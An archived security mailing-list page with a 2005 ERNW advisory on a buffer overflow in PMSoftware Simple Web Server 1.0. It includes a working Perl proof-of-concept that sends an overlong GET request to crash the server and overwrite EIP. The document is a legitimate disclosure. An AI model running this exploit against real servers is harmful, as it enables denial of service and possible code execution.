Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] ERNW Security Advisory 01/2005

from [Mailinglists] Network Security [Permanent Link]
Subject: [Full-disclosure] ERNW Security Advisory 01/2005
Date: Mon, 18 Apr 2005 18:54:22 +0200 
ERNW Security Advisory 01-2005

Buffer Overflow in PMSoftware's Simple Web Server

Author:
Michael Thumann <mthumann[at]ernw.de>

1. Summary:
Simple Web Server doesn't do proper bounds checking handling normal GET 
requests.
Sending an overlong page or script name, it causes an buffer overflow and an 
attacker
can controll the EIP to run arbitrary code on the victims machine.

2. Severity : Critical

3. Systems affected
The vulnerability was testest with Simple Web Server  1.0

4. Patch Availability :
No patch available

5. Details
The follwoing request causes Simple Web Server to crash:

GET /AAAAAA.....AAAA  with 260 As

A Proof of Concept Code is published with this Advisory

6. Solution
Use another web server ;-)

7. Time-Line 
17  Feb 2005: Vulnerability reported to vendor
28 Feb 2005: 2nd report because the vendor didn't respond
07 Mar 2005: 3rd mail sent to thre vendor - vendor didn't respond
18 Apr 2005: Public Disclosure

8. Exploit

#!/usr/bin/perl
# DoS Exploit By mthumann@ernw.de
# Tested against WinXP + SP2
# Remote Buffer Overflow in PMSoftware Simple Web Server 1.0.15
# buffer[250] 

use Socket;

print "PMSoftware Simple Web Server Exploit by Michael Thumann \n\n";

if (not $ARGV[0]) {
        print "Usage: swsexploit.pl <host>\n"; 
exit;}

$ip=$ARGV[0];

print "Sending Shellcode to: " . $ip . "\n\n";
my $testcode=
"ERNWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB".
"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC".
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD".
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE".
"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF".
"ABCDEFGHIJAAAA"; #EIP =41414141

my $attack="GET /".$testcode." HTTP/1.1\n" ;

$target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              
                $|=1;
                print $attack;            
                my @in=<S>;
                select(STDOUT);
                close(S);
        } else { die("Can't connect...\n"); }


9. Disclaimer
 The informations in this advisory are provided "AS IS" without warranty 
of any kind. In no event shall the authors be liable for any damages 
whatsoever including direct, indirect, incidental, consequential, 
loss of business profits or special damages due to the misuse of any 
information provided in this advisory. 



 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] ERNW Security Advisory 01/2005, Mailinglists <=
Previous by Date:  [VulnWatch] [DR001] AppleWebKit XMLHttpRequest arbitrary file disclosure vulnerability, David Remahl
Next by Date:  [Full-disclosure] The first open source spyware, khaalel
Previous by Thread:  [VulnWatch] [DR001] AppleWebKit XMLHttpRequest arbitrary file disclosure vulnerability, David Remahl
Next by Thread:  [Full-disclosure] The first open source spyware, khaalel
Indexes:  [Date] [Thread] [Top] [All Lists]